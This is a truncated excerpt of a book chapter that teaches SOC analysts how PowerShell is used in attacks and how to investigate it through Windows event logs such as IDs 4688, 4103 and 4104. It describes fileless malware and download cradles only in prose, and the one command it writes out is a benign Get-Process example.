Since 2017, security researchers have noted a high increase in the use of PowerShell during the different phases of the attack chain. Also, there are several ready-to-use PowerShell scripts and frameworks that help attackers to achieve their objectives such as stealing credentials, pivoting, internal discovery, and enumeration. As a SOC Analyst, you should have knowledge of PowerShell and its usages, along with how to investigate suspicious PowerShell activities and the event logs provided by Microsoft that help you to track and investigate suspicious PowerShell executions.

The objective of this chapter is to teach you what PowerShell is, why attackers prefer PowerShell, PowerShell’s usage in different attack phases, the events provided by Microsoft that allow you to track PowerShell execution activity, and examples of the techniques and command-line arguments of PowerShell attacks.

In this chapter, we’re going to cover the following...

PowerShell is a Microsoft command-line shell and scripting tool introduced by Microsoft in 2005 and installed on all new Windows versions by default for automation and configuration management. PowerShell is designed for system administrators as it is a very powerful tool that allows you to control and manage almost the entire system with secure remote capabilities.

PowerShell extended its functionality by depending on cmdlets (pronounced command-lets), which are collections of specific commands allowing PowerShell users to conduct specific tasks, such as remote to another system; display processes; and more. Cmdlets follow a verb-noun naming pattern and commonly consist of three different entities – a verb, a noun, and an option: verb-noun[-parameter]. See some examples here:

• Get-Process -name svchost: The Get-Process cmdlet is used to obtain information about the processes running on a computer. By specifying the -name parameter followed by...

In addition to Event ID 4688, which logs the execution of a PowerShell process, along with its command-line argument, Microsoft records several event logs that allow you to track PowerShell activities. Some of those event logs are generated by all PowerShell versions and some of them are just generated when specific PowerShell versions are installed. In this section, we will discuss three event logs that are valuable for investigating and tracking suspicious PowerShell execution activities. These events exist in two PowerShell event files – Event ID 800 exists in the Windows PowerShell Event Log file and Event IDs 4103 and 4104 exist in the Microsoft-Windows-PowerShell/Operational event log file.

From PowerShell version 5 onward, Microsoft has provided a new logging feature to log entire executed PowerShell script blocks. By default, the script block logging feature is disabled, but it automatically logs any suspicious script execution...

In the previous sections, you learned about the PowerShell and Windows event logs that help you investigate suspicious executions with PowerShell. During this section, we will introduce an example of PowerShell attacks and examples of suspicious PowerShell commands and cmdlets, along with their description and purpose, to help you investigate and observe suspicious PowerShell executions.

Fileless PowerShell malware

Fileless malware, also known as memory-based malware, refers to a type of malicious code that runs directly in memory without leaving traces of traditional executable files on the system disk.

An attacker may use a PowerShell cradle to download a malicious PowerShell script and execute it directly in memory to evade writing to the disk and evade being detected by defense mechanisms. The following is an example of a common PowerShell cradle that uses the DownloadString function to download a malicious script from a remote server to...

In this chapter, you learned what PowerShell is, why attackers prefer PowerShell, PowerShell’s usage in different attack phases, the events and logs provided by Microsoft that allow you to track PowerShell execution activity, and examples of techniques and command-line arguments typical of PowerShell attacks.

In the next chapter, you will learn a list of the persistence and lateral movement techniques and how to investigate and track them using the event logs provided by Microsoft.